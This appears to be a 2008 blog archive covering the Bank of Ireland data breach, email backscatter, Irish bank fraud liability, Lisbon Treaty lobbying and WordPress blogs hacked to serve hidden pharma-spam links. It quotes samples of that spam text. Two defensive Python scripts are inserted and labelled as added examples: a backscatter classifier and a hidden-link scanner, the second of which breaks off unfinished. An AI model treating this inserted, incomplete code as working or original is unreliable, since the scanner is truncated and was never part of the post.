Given an RSS or Atom feed’s URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it’s missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you’re looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James’s Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James’s Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James’s Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James’s Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in ‘a net reduction in staff of around 250’, the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants “do not have the scale necessary for sustained success in increasingly competitive market conditions”.

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered “a severance package alongside career counselling”.

Operations at its Waterford brewery will be “streamlined” as part of the re-organisation leading to “some reduction in output”. The current workforce of 27 in Waterford would be reduced to ‘around 18’ but Diageo was unable to confirm the extent of the output reduction.

The company says the St James’s Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James’s Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: ‘Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.’

“Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage.”

Guinness has been brewed at St James’s Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

The Lisbon Treaty and Libertas’ astroturf

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon — the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it’s not particularly “sexy”: it’s a pretty abstruse and boring set of issues, and deciding which way to vote is not easy with such snore-worthy stuff at stake.

One of the organisations campaigning for a “no” vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you’re interested in Irish politics and the international reach of US lobbying. Here’s some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[…]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was “joining the No To Lisbon Campaign” and publicised the event with a photo-opportunity of the two ‘entrepreneurs’ in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What’s particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). […] According to the [ US Air Force’s Integrator Magazine ], “industry insiders say [McEvaddy’s] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields.” In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn’t have to stop over at foreign airports such as Shannon on their way to “interrogate” suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the “astroturf” nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behind the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out — it’s a must-read.

BoI data breach: a sample customer notification

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now). BoI promised to contact the “affected” customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here’s one, via a friend who found himself in this unenviable position:

So it’s not just name, date of birth, and address — he notes that they’ve leaked ‘information on the current account I use to pay for the policy.’

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch — which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [… list of branches omitted…]

The update from 28 April doesn’t clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Back in 2006, I wrote a script I called “goog-love.pl”; it used Google’s now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was “winning” on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google’s Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:

[image: Webmaster Tools “Statistics / Top search queries” page for taint.org]

This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Check out this logic from the Bank of Ireland, spotted by waider in today’s news:

Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. […]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was ‘very low’, as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is ‘very low’? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Peter G. Neumann at the RISKS Forum notes that last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years ago over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today’s incarnations of spam.)

Also somewhat before Mike’s time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart’s innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

It’s been a while since I’ve listed the various sub-sites of taint.org in one post. I’ve just updated the taint.org wiki’s index page to include them, so might as well list them here, too:

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Bank of Ireland, one of Ireland’s biggest high-street banks, was the subject of a breach notification yesterday — 4 laptops, containing unencrypted “sensitive personal information” about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops ‘were being used by staff working for Bank of Ireland’s life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.’

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn’t understand the value of this data — so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become — using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches go on to fall victim to identity theft.

Some comments from the bank from those articles:

‘The data was not encrypted, although it is understood there was software security installed on the stolen computers.’

Doubtless, “software security” refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

‘In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.’

This is a fallacy. This data provides plenty of information regarding the customer’s identity — information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank’s accounts is of no help in that case. On top of that, identity information like your date of birth, mother’s maiden name, health status, and so on doesn’t expire — that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O’Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however — a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL’s errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

  • Drogheda
  • Dunleer
  • Bagnelstown
  • Court Place Carlow
  • Stephens Green
  • Tallaght
  • Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn’t issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

“The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks,” Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification — examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it’ll be interesting to see if anything happens. For “live” customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice — but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding — it turns out that if you’re male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith’s team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study’s design to account for a factor that might explain the findings — that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here’s the science bit, via the BMJ — a paper entitled ‘Sex and death: are they related? Findings from the Caerphilly cohort study’:

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men’s health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it’d be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

  • Ride time: 12:16
  • Trip distance: 2.4 miles
  • Avg speed: 12.7 MPH
  • Max speed: 22.4 MPH
  • Total KCal work performed: 136
  • Max pulse rate: 146

Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Google Calendar has a nifty feature, “Quick Add”, where you can enter a natural-language string like “lunch with Justin, 1pm 20/4/08”, it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can’t be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I’ve forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that’s overkill — I don’t want the overhead of another extension, the upgrade worries, and I don’t want it using up a keyboard shortcut either. I’d prefer to just have this as a Firefox Smart Keyword — and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here’s the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD

Keyword: newcal

Description: add a new event in Google Calendar

enjoy!

Downloadable movies and the DVP5960

So Mulley mentions that Moviestar.ie are planning to offer downloadable movies. Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:

‘When the service goes live on 1 May, customers will be able to avail of content from several Irish producers including Network Ireland Television, as well as Video International’s film library which includes films like The Little Shop of Horrors. The company is also seeking content from both the History and Biography Channels, which would mean a substantial back catalogue of documentary shows.’

Sorry, but: snore.

Secondly, the technology used:

‘Moviestar.ie content must be downloaded onto a PC or laptop but can then be transferred over to digital media players like the iPod Touch for viewing on the go. This service will be compatible with Apple Macs but only if the user downloads Windows Media Player.’

So in other words, it’s Windows Media. That means it won’t play on my TV through my MythTV box, on a USB stick plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late. Plenty of Irish consumers are already consuming downloaded video — as the popularity of the Philips DVP5960 demonstrates. For legal video downloads to work, they need to be somewhere remotely near as convenient and usable as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years. Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today — legal downloads using the MP3 format.

BTW, I know that’s the same DRM technology used by Channel 4’s “4oD” download service. Big deal — I don’t bother trying to watch that stuff either, for the same reasons. If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?


(By the way, that Philips DVD player is a total success story. That’s a name-brand hardware manufacturer, making a low-end, $60 DVD player, with support for viewing downloaded XviD AVI movies on a USB stick. Apparently it’ll also play off USB hard disks, too. It’s immensely popular; for example, here’s a customer review of 10/10: “Best thing ever”. Several of my friends have them, and praise them highly. I’m coming up to DVD player replacement time, and I’m planning to get one too.)

Backscatter rising

Recently, more and more people have been complaining about backscatter; its levels seem to have increased over the past few weeks.

If you’re unfamiliar with the terminology — backscatter is mail you didn’t ask to receive, generated by legitimate, non-spam-sending systems in response to spam. Here are some examples, courtesy of Al Iverson:

  • Misdirected bounces from spam runs, from mail servers that “accept then bounce” instead of rejecting mail during the SMTP transaction.
  • Misdirected virus/worm “OMG your mail was infected!” email notifications from virus scanners.
  • Misdirected “please confirm your subscription” requests from mailing lists that allow email-based signup requests.
  • Out of office or vacation autoreplies and autoresponders.
  • Challenge requests from “Challenge/Response” anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don’t know.

It used to be OK to send some of these types of mail, but no longer. Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is no longer considered good practice to “accept then bounce” mail after the SMTP session has ended, or in any other way to send an automatic reply to a sender address that has not been verified: the envelope sender of spam is almost always forged, so the reply lands on an innocent third party.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of “real” sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address Verification filters.

There’s an alternate theory that spammers use backscatter as a means of spam delivery — intending for the mails to bounce, in effect using the bounce as the spam delivery mechanism. Symantec’s most recent “State of Spam” report in particular highlights this.

I don’t buy it, however. Compare their own example message. Here is the mail as originally sent by the spammer to the bouncing system, rendered:

[image: the spammer’s original message, rendered]

And here’s what it looks like once it passes through the bouncer’s mail system:

[image: the same message after passing through the bouncing system]

That’s simply unreadable. There’s absolutely no way for a targeted end user to read the “payload” there…

Getting rid of it

I haven’t run into this recent spike in backscatter at all, myself, since I have a working setup that deals with it. This blog post describes it. If you’re using Postfix and SpamAssassin, it would be well worth taking a look; if you’re just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the ‘whitelist_bounce_relays’ setting to use the ruleset, otherwise its rules will not fire.

SPF

There’s a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains, will reduce the amount of backscatter sent to your domains. Again, I doubt it.

Backscatter is being sent by old, legacy mail systems. These systems aren’t configured to take SPF into account either. When they’re eventually updated, it’s likely they’ll be fixed to simply not send “accept then bounce” responses after the SMTP transaction has completed. It’s unlikely that a system will be fixed to take SPF into account, but not fixed to stop sending backscatter noise.

It’s good advice to use these records anyway, but don’t do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces sent in response to your own mail. As long as the error conditions are flagged during the SMTP transaction (as they should be nowadays), and you’ve specified your own mailserver(s) in ‘whitelist_bounce_relays’, you’re fine.
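The relay check described above, as an added example in Python (this is not code from the original post, nor from SpamAssassin or Postfix; it mirrors the idea behind the VBounce ruleset’s ‘whitelist_bounce_relays’ setting): a message is treated as a bounce if it is a multipart/report DSN, an RFC 3834 auto-reply, from MAILER-DAEMON/postmaster, or has a null return path; it is then only a legitimate bounce if one of our own outbound relays appears in a “by …” clause of the Received: trail of the quoted original. The relay hostnames and the two sample DSNs are constructed for the example.

```python
"""Backscatter check: is this bounce for a message we actually sent?

A DSN is only legitimate if the original message it quotes passed through
one of our own relays; anything else is a bounce for forged mail.
"""
import email
import email.utils
import re
from email import policy
from email.message import EmailMessage

# Hostnames of our outbound MTAs (assumption for this example; the same
# role as SpamAssassin's whitelist_bounce_relays setting).
OUR_BOUNCE_RELAYS = {"mail.example.com", "mx2.example.com"}

# The "by <host>" clause of a Received: header names the MTA that accepted the hop.
BY_HOST_RE = re.compile(r"\bby\s+([A-Za-z0-9.-]+)", re.I)


def is_bounce(msg: EmailMessage) -> bool:
    """True if the message is a DSN, an auto-reply, or from a null/daemon sender."""
    if (msg.get_content_type() == "multipart/report"
            and (msg.get_param("report-type") or "").lower() == "delivery-status"):
        return True
    if (msg.get("Auto-Submitted") or "no").lower() != "no":   # RFC 3834 auto-replies
        return True
    sender = email.utils.parseaddr(msg.get("From", ""))[1].lower()
    if sender.startswith(("mailer-daemon@", "postmaster@")):
        return True
    return (msg.get("Return-Path") or "").strip() == "<>"


def original_received_relays(msg: EmailMessage) -> list[str]:
    """Hosts named in 'by ...' clauses of the quoted original's Received: trail."""
    hosts = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "message/rfc822":          # full original attached
            original = part.get_payload(0)
        elif ctype == "text/rfc822-headers":   # only the original's headers
            original = email.message_from_string(part.get_content(), policy=policy.default)
        else:
            continue
        for received in original.get_all("Received", []):
            m = BY_HOST_RE.search(str(received))
            if m:
                hosts.append(m.group(1).lower().rstrip("."))
    return hosts


def classify(raw: bytes) -> str:
    """'not-a-bounce', 'legitimate-bounce' (our relay handled the original),
    or 'backscatter' (a bounce for mail we never sent)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if not is_bounce(msg):
        return "not-a-bounce"
    if any(host in OUR_BOUNCE_RELAYS for host in original_received_relays(msg)):
        return "legitimate-bounce"
    return "backscatter"


def sample_dsn(received_trail: str) -> bytes:
    """Constructed sample: a Postfix-style DSN quoting an original message
    whose Received: trail is received_trail (not real traffic)."""
    return (
        "Return-Path: <>\n"
        "From: MAILER-DAEMON@victim.example.net (Mail Delivery System)\n"
        "To: user@example.com\n"
        "Subject: Undelivered Mail Returned to Sender\n"
        'Content-Type: multipart/report; report-type=delivery-status; boundary="b1"\n'
        "\n--b1\nContent-Type: text/plain\n\n"
        "This is the mail system at host victim.example.net.\n"
        "\n--b1\nContent-Type: message/delivery-status\n\n"
        "Reporting-MTA: dns; victim.example.net\nAction: failed\nStatus: 5.1.1\n"
        "\n--b1\nContent-Type: message/rfc822\n\n"
        + received_trail
        + "From: user@example.com\nTo: nobody@victim.example.net\nSubject: hello\n\nbody\n"
        "\n--b1--\n"
    ).encode()


# Spam run that forged our address: the only hop is the bouncing MTA itself.
FORGED_TRAIL = (
    "Received: from [10.0.0.1] (unknown [198.51.100.7])\n"
    "\tby victim.example.net (Postfix) with ESMTP id 4F1A2\n"
)
# Mail we really sent: our own relay appears in the trail.
REAL_TRAIL = (
    "Received: from mail.example.com (mail.example.com [192.0.2.25])\n"
    "\tby victim.example.net (Postfix) with ESMTP id 4F1A3\n"
    "Received: from laptop (dsl-1.example.com [192.0.2.99])\n"
    "\tby mail.example.com (Postfix) with ESMTPSA id 9B7\n"
)

if __name__ == "__main__":
    for name, trail in (("forged", FORGED_TRAIL), ("real", REAL_TRAIL)):
        print(name, classify(sample_dsn(trail)))
```

Note that this trusts the Received: headers quoted inside the bounce, which a spammer can forge; that is why the ruleset only fires on bounces at all and why the relay list should contain hostnames that are not trivially guessable from your MX records.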

Liability for internet banking fraud in Ireland

Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them “acting without reasonable care”, where “reasonable care” bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer protection offered by the US banks.

I was curious, so I went looking at the Irish situation. Needless to say, it’s not pretty.

I couldn’t find anything in the Irish Banking Federation’s Code Of Practice for Personal Customers, unfortunately. However, AIB’s terms and conditions for use of their Internet Banking product contain this:

5 Transactions on the Account:

5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User’s Account is maintained in joint names the liability of the Account Holders shall be joint and several.

5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.

6 International Payments:

6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence. In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.

As far as I can tell, basically the AIB have no liability here at all — if a bad guy gets hold of your PIN code and account number, and empties your account, tough luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006. But their 365online Terms and Conditions now say this:

13 Indemnity

13.2 Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability whatsoever in respect of any loss suffered by the Customer as a result of their breach of Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or any of them.

So it’s all pretty bad news for Irish banking customers, and it’s only a matter of time before Irish banks are targeted by a new banking Trojan. Given that antivirus software has an 80% miss rate these days, even having an up-to-date AV scanner isn’t going to be much help.

My answer? Don’t do internet banking on Windows machines. Simple as that.

IIA’s nasty infection

The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs. That’s about what you’d expect — comparable with Chris Horn’s blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs Technorati Top 100 — beating Damien Mulley‘s 7,859, but just short of Donncha O’Caoimh‘s stellar 3,434 — and ahead of these other gods of the Irish blogosphere:

Pretty impressive ;)

I was curious, so I went investigating. Of those thousands of inbound links, here’s some samples of the most recent, pasted from the Technorati inbound links page:

barkingmoose

Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal

4 days ago in barkingmoose by barkingmoose · Authority: 3

The Peninsula’s Edge

Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic

6 days ago in The Peninsula’s Edge by ricsmith510 · Authority: 9

The Incredible Blog

Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application

7 days ago in The Incredible Blog · Authority: 1

Quilters’ Blogs

Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap 7 days ago in Quilters’ Blogs · Authority: 5

TPN :: Martial Arts Explorer

Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low 7 days ago in TPN :: Martial Arts Explorer · Authority: 56

Take a look at the ‘inbound links’ list — thousands more just like that.

All of the affected blogs have been hacked to deliver these spam links. They run unpatched versions of WordPress vulnerable to a major security hole. On a casual visit, their pages seem fine — but “View Source”, scroll to the bottom, and there are thousands of spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA’s blog wind up in this collection?

It’s worth noting that the IIA’s blog does not display the same symptoms — the links aren’t present on their pages.

However, this post provided a good tip as to what has happened. Those infected blog pages point, in turn, to other infected blogs. Somewhere within the IIA’s blog setup, there’s a page inserted by a bad guy, collecting thousands of illicit links from thousands of other infected sites — and sure enough, Irish Web Watcher found it on the IIA’s site — here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and urgently — there’s already a lot of spammy results appearing in the Google index from that site, and the next step after that is usually removal from the index once Google notice it.
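A way to check your own pages for this kind of infection, as an added example (not code from the original post, from the IIA, or from WordPress): a scanner that parses a page with Python’s stdlib HTML parser and counts links that sit inside a container hidden by CSS or the HTML5 hidden attribute, plus links whose text or href carries the usual pharma/credit keywords, which is exactly what “View Source, scroll to the bottom” finds by hand. The keyword list, the threshold and the two sample pages are assumptions constructed for the example.

```python
"""Detect the hidden spam-link block that compromised WordPress installs serve.

Counts <a> elements inside an element hidden by CSS (display:none,
visibility:hidden, pushed off-screen) or the HTML5 hidden attribute, and
links whose text/href carry spam keywords. Thresholds and keyword list are
assumptions for this example.
"""
import re
from html.parser import HTMLParser
from typing import NamedTuple

HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.I)
SPAM_WORDS = ("cialis", "viagra", "propecia", "phentermine", "tramadol",
              "xanax", "ambien", "ringtones", "credit report", "credit card")
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input"}
HIDDEN_LINK_THRESHOLD = 10   # assumption: this many hidden/spammy links is an infection


class Link(NamedTuple):
    href: str
    text: str
    hidden: bool


class HiddenLinkScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links: list[Link] = []
        self._open: list[tuple[str, bool]] = []   # (tag, hidden?) for open elements
        self._hidden_depth = 0                    # > 0 while inside a hidden element
        self._current = None                      # the <a> being collected

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = "hidden" in attrs or bool(HIDDEN_STYLE_RE.search(attrs.get("style") or ""))
        if tag == "a":
            self._current = [attrs.get("href") or "", [], hidden or self._hidden_depth > 0]
        if tag not in VOID_TAGS:
            self._open.append((tag, hidden))
            self._hidden_depth += int(hidden)

    def handle_data(self, data):
        if self._current is not None:
            self._current[1].append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            href, chunks, hidden = self._current
            self.links.append(Link(href, " ".join("".join(chunks).split()), hidden))
            self._current = None
        # Pop back to the matching open tag (tolerates unclosed tags in between).
        for i in range(len(self._open) - 1, -1, -1):
            if self._open[i][0] == tag:
                self._hidden_depth -= sum(int(h) for _, h in self._open[i:])
                del self._open[i:]
                break


def scan(html: str) -> dict:
    """Link counts and an infected/clean verdict for one page."""
    parser = HiddenLinkScanner()
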